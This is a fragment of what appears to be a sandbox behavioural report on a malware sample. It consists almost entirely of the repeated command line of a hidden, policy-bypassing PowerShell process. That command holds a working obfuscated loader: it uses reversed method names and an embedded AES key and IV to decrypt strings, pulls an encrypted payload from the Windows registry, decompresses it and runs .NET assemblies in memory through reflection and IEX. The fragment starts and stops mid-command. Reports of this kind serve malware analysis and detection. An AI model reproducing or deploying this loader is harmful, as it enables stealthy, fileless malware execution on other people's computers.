$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      Executes dropped EXE
      PID:6488
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      PID:3808
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
      4⤵
      PID:1664
  - - C:\Windows\$sxr-powershell.exe
      "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5168).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = 